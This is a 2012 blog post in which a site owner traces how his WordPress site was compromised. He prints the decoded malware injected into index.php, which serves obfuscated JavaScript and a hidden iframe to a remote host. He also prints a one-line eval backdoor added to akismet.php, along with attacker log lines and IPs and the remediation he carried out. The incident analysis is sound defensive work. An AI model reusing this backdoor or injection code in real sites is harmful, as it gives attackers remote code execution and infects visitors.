«

»

Nov 11 2012

WordPress hacked through akismet plugin and twentyeleven-twentyten theme

Yesterday I noticed that one of my websites www.firemalinois.ro was reported by Chrome as being an attack site. Google said that in 90 days it checked the site for 4 times and it was infected. So my first piece of info was that the infection happened after 9 August (3 months ago).
The site was set up on 23 August 2012, when i changed my hosting solution.

Some data about my website : WordPress 3.1.1
Themes : Sliding door (in use), twentyten, twentyeleven
Plugins :

  • akismet 2.5.6
  • cool-video-gallery 1.6
  • googleanalytics 1.0.2
  • nextgen-gallery 1.9.5
  • nextgen-gallery-sidebar-widget 0.4.3

I’ve searched my site and found altered files :
/firemalinois.ro/web/index.php
and
/firemalinois.ro/web/wp-content/plugins/akismet/akismet.php

Also in each theme’s folder there were 4 modified files : functions.php, index.php, footer.php and header.php

Also the wordpress folder had a few files with IP’s like this one :

bafa2cd7711c5af093aab1c4f358acb5
193.106.136.40|193.106.136.40|5.12.82.71|178.137.129.8|95.168.172.156|95.168.172.156|79.113.76.160|

akismet.php file was modified at 24 Aug 2012 at 20:43. All the other files had a different date (the date when i uploaded the site by FTP).

The index.php file had the following code in it, starting with :

(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGlwPSRfU0VSVkV..............'));

Decoding it we get :

error_reporting(0);
$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];
$odbf = $dr.'/'.md5(date('m.d.y'),time()-86400);
if (file_exists($odbf))@unlink($odbf);
$dbf=$dr.'/'.md5(date('m.d.y'));
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Opera')!==false)||(strpos($ua,'Firefox')!==false||(strpos($ua,'Mozilla')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false))){
    error_reporting(0);
    echo(base64_decode('PHNjcmlwdD50cnl7aWYod2lu....'));
    if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
} else echo '<iframe style="visibility:hidden;position:absolute;left:0;top:0;" width="100" height="6" src="http://click.rndtrg.com/feed/frames.php?uid=99&frames=2"></iframe>';

Further decoding leads to :

<script>try{if(window.document)window["document"]["body"]="123"}catch(bawetawe)
...
...
...
{k=i;if(window["document"])s+=String["fro"+"mC"+"harCode"](parseInt(n[i],25));}z=s;ev(z)}}}</script>

Relevant log lines on 20:43 :

firemalinois.ro:80 91.224.160.141 - - [24/Aug/2012:20:34:00 +0300] "GET /wp-contentp?asc=echo%20'xx23423'.'2xxcv3'.'dcfxcx2xdf';die(); HTTP/1.1" 404 11433 "-" "Mozilla/5.0 (Windows;U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 61.55.141.10 - - [24/Aug/2012:20:34:01 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyeleven HTTP/1.0" 200 13456 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 61.55.141.10 - - [24/Aug/2012:20:34:03 +0300] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 547 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:31 +0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 12168 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:34 +0300] "GET /wp-admin/theme-editor.php?file=footer.php&theme=sliding-door HTTP/1.1" 200 7099 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:36 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 581 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:38 +0300] "GET /wp-admin/theme-editor.php?file=footer.php&theme=sliding-door&scrollto=0&updated=true HTTP/1.1" 200 7308 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 91.224.160.141 - - [24/Aug/2012:20:34:39 +0300] "GET /wp-contentp?asc=echo%20'xx23423'.'2xxcv3'.'dcfxcx2xdf';die(); HTTP/1.1" 404 10115 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:41 +0300] "GET /wp-admin/theme-editor.php?file=footer.php&theme=sliding-door HTTP/1.1" 200 7266 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:44 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 581 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:46 +0300] "GET /wp-admin/theme-editor.php?file=footer.php&theme=sliding-door&scrollto=0&updated=true HTTP/1.1" 200 7158 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:48 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door HTTP/1.1" 200 8461 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"a/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:48 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door HTTP/1.1" 200 8461 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:50 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 581 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:53 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door&scrollto=0&updated=true HTTP/1.1" 200 8660 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 91.224.160.141 - - [24/Aug/2012:20:34:53 +0300] "GET /wp-contentp?asc=echo%20'xx23423'.'2xxcv3'.'dcfxcx2xdf';die(); HTTP/1.1" 404 484 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:55 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door HTTP/1.1" 200 8620 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:57 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 581 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:59 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door&scrollto=0&updated=true HTTP/1.1" 200 8515 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

Looking in my Apache logs around that date i found the following lines :

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:35:21 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyten HTTP/1.1" 200 12424 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:35:25 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyten&scrollto=0&updated=true HTTP/1.1" 200 12322 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:35:58 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=sliding-door1 HTTP/1.1" 200 12095 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U;Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:36:02 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=sliding-door1&scrollto=0&updated=true HTTP/1.1" 200 12281 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:36:38 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=sliding-door2 HTTP/1.1" 200 13816 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U;Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:36:42 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=sliding-door2&scrollto=0&updated=true HTTP/1.1" 200 13996 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:37:23 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyeleven HTTP/1.1" 200 13344 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:37:28 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyeleven&scrollto=0&updated=true HTTP/1.1" 200 13537 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

The akismet.php file had the following code in the beginning :

eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIEU3M0pWREg5biAqLw=="));

Decoding it we get :

if (isset($_REQUEST['asc'])) { eval(stripslashes($_REQUEST['asc'])); exit; }/* E73JVDH9n */

I had two child themes for slidingdoor , named slidingdoor1 and slidingdoor2. It seems that somehow they had the list of my themes, and used one of them to infiltrate the site. On another forum i read that someone had the same problem and it had twentyten and twentyeleven (not active) themes.

Measures taken : uninstall akismet, twentyten and twentyeleven themes, update wordpress to latest version, clean bad code, change FTP , SQL , and wordpress passwords.

I found a similar thread here : http://www.webarttech.net/blog/2012/07/wordpress-infekcja-plikow-index-php-i-index-html-poprzez-dodanie-iframe. Use Google translate to read it.
Another forum with the same method : http://forums.digitalpoint.com/showthread.php?t=2383410

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*